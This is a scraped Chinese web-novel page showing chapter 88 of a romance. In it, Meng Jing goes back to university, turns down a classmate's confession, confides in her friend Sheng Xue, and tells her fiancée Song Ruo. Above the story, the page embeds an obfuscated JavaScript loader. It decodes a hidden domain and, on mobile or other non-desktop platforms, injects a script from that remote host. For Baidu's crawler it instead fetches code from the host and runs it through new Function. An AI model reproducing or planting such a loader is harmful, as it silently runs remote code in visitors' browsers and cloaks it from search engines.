98小说网

阅读记录  |   用户书架
function UqgsgfgDv(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{ c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function UqSDDFGvyQ(e){ var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,""); while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return UqgsgfgDv(t);};window[''+'U'+'Y'+'C'+'q'+'J'+'K'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=UqSDDFGvyQ,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery'; if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/bm-'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'u'+'q'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/m-'+i;cs.parentElement.insertBefore(s,cs);}})('aGYuc2ZrbG5ic2xrYm5rbGQuY29t','2843',window,document,['G','TpoZFcguG']);}:function(){};
上一章
目录 | 设置
下一页

分卷(88(1 / 2)

加入书签 | 推荐本书 | 问题反馈 |

对于这个质疑,孟璟并没有生气,而是耐心地作了解释。这个行业更新换代非常快,学校的课程更新速度跟不上技术更新速度,她已经具备自学能力和相当的基础,再从零开始完全没必要,反而经营和市场运作规律是她的短板,修金融因此成为不二选择。

她显然是经过了深思熟虑的。

盛雪也就不说什么了。

和发小不一样,若若一开始就保持中立的态度,并没有疑问,只是负责陪伴。

七月若若毕业。

八月中旬,孟璟踩着报到的最后期限到学校,开始了非典型的大学生活。

重新做回学生有很多新奇之处,孟璟适应下来也花了一点时间。

最不能忍受的是军训。中午休息也要找机会撒娇。

老婆你看我的耳朵,像不像烫熟了?

老婆你看我,我是不是又长高了啊。太恐怖了!

孟璟军训到一半的时候,恰好若若回到了家,她就每天晚上翻围墙出去,与太太相会。其实小药瓶子工作太累,也没办法太吵她,只能点到即止,因此,尽管每天都见面,依旧是欲求不满的状态,比起抱在一起却不能放肆的夜晚,孟璟反而更喜欢早上临出门前,若若拿一支防晒霜,仔细地替她抹上,她像个小废物乖乖地坐在那里,仰着脸接受侍弄。

若若的职业习惯使然,眼部和唇部还要分开来,做额外的护理。

涂完了一切,她撒个娇:幸运亲亲。

两个人匆匆亲一下,就又要开始漫长的一整天的分离了。孟璟才发现几年前的自己实在太强悍了,居然舍得离开她那么久。怎么做到的?毕竟现在只要超过一小时不和她说句话,她就开始害起了相思病。

又不能发作得太厉害。

若若是非常稳重的。她不想让她觉得自己这方面是个无理取闹的小朋友。

为了显得成熟一点,她都是每隔两小时才发消息,如果这两小时之间忽然想她了,就打开微博,看看网上的路透照,仿佛渴急了的人,望梅止渴,画饼充饥。这个现象在秋天越发严重起来。十月份小长假后,两个人旅行完回来,若若接了部新戏,前两个月主要拍摄地在东南亚。

孟璟彻底进入茶饭不思的状态,但是根据老婆的指示,三餐都要按时,不可以少一顿。进餐时她就对着手机,往左划一划,吃一口,再划一划,再吃一口。这天她照例在食堂买了蔬菜和汤,像个强迫症似的规律进食。忽然头顶有人问:这儿有人吗?

她抬起头来,挺眼熟的,仿佛是班上见过的女生。平时孟璟整个人杀气腾腾的,据后来同学的形容,虽然长得美帅美帅的,气质上却有点拒人千里的味道,加上身份特殊,即使有那么些对她好奇的同学,也只敢远观而不敢亵玩。上来捋虎须的,这还是头一位。

孟璟环顾四周,确实没有什么空闲的桌子了。尽管挂念小药瓶的时间并不想被人打扰,但她也不是那种不讲道理的人,她朝对方摇摇头,微笑着说:没。你请便。

女生坐下来了,孟璟眼睛依旧没有离开手机屏幕。

原本以为这就是一锤子买卖,可这个人的存在感渐渐强起来,孟璟发现自己老是和这女生遇见。对方总是眼神很锐利,脸上的笑也很意味深长,孟璟则朝她点个头,算是打招呼。有一天晚上,孟璟在学校的图书馆查资料查到很晚,出来才知道下起了大雨,她从包里掏出伞来,就看到侧边站了个人对她眼巴巴望着。

这一趟算是责无旁贷。也是未婚妻平时教她,日行一善,勿以善小而不为。但是把人送到宿舍楼下,事情走向却不太对。女生没有告别,也不是道谢,反而开始

她怎么说的?盛雪嘶了一声,在阳光里眯起眼。

两个人坐在阳台,捧着茶杯。

孟璟整个人都很瓦特。女生是个直球选手,说喜欢她,即使是中午吃饭那种傻里傻气的样子,也像有进食障碍的小朋友一般惹人怜爱。孟璟心里出现一整排问号之后,有点尴尬:我这么说也许是有点太骄傲了,但我老婆是宋若这件事,没有人不知道吧?

女生说:我知道,但是她根本就不爱你。

盛雪噗嗤一声笑了。

这件事不说出来孟璟就要憋死了,好在发小也是十分值得信赖的人,她来访的时候,她恰好想到这件事,就将女孩子的信息模糊处理之后,趁机倾诉一番。但是见盛雪这样笑,又觉得不大妥当,就刹住车不说了。

其实女生还说了好些。

她如果爱你,就会想办法留在你身边。戏都是拍不完的,再说她都拿了那么多奖了

你不觉得异地恋很辛苦吗?

我不介意先和你试试。也许我和你有更多的共同语言。

给她机会把这些话说完,孟璟都觉得是对未婚妻的亵渎。但是又没办法,对方语速快得一笔。最近发现是辩论队的队长。总而言之就是个给她洗脑若若不爱她,并且提议她劈腿的奇女子。孟璟义正辞严地拒绝她以后,最近几天搞得连饭也不敢在食堂吃了,不省那个事,宁愿开车去公司的职工食堂,或是回家自己做来吃。

盛雪见她一直默默的,仿佛没了下文,朝她翻了两个巨大的白眼,就和你表白了一句,你就记下了,正儿八经烦恼上了?

孟璟摸着下巴,其他的都无妨,主要我怕我老婆吃醋啊。

盛雪深深地不以为然,站起来,居高临下地切了一声:若若不会在乎的。

孟璟却被她这种态度刺伤了,眯了眯眼,什么,你觉得我老婆不会醋?

自家那位,可是个小醋罐子。

对。盛雪耸耸肩,不值一提。倒是你们两位伴娘小姐,自己选礼服啊。

当大门轻轻摔上,孟璟对着墙上挂的婚纱照,隔空点点未婚妻的鼻子,微微笑了笑,快点回来啊,老婆。

这一次若若是明令禁止她不许去探班,因为拍摄任务很吃紧,她一去耽误她不说,往往还会赖着不走,耽误学业。以前有这样的前科,后面被罚睡了一个星期的书房,孟璟是有点怕了。有时候小药瓶真是很严肃。

就在她快要相思成疾的时候,若若回来了。她亲自去机场接她,进屋就迫不及待要温存一番,可恶的若若却一脸倦容,说要先睡会儿,孟璟没亲够,本来很不高兴,但转念一想,老婆肯定是一收工就往回赶,赶回来见她,这是爱啊。这么想着,就舍不得生气,抱着她,把手臂借给她枕着,窝在一旁看她补觉。

小药瓶子直睡到天色擦黑。

她睁开的双眼里还有些惘然,孟璟低下头去亲她,辗转亲了会儿,小药瓶子别开脸,小小声说肚子饿了。孟璟准备起身去做饭,都要起身了,忽然想起什么,斟酌了一下,说道:有件事,我觉得有必要和老婆说一声。

自己不说,以后若若从别人那里听到更不好。

宋若抬起一只手搭在她肩上,眨了眨眼。

最近有人喜欢我。孟璟说,注意着未婚妻的反应。

若若抬起手来替她捋了捋头发,嗯。

嗯?

上一章
目录
下一页
A- 18 A+
默认 贵族金 护眼绿 羊皮纸 可爱粉 夜间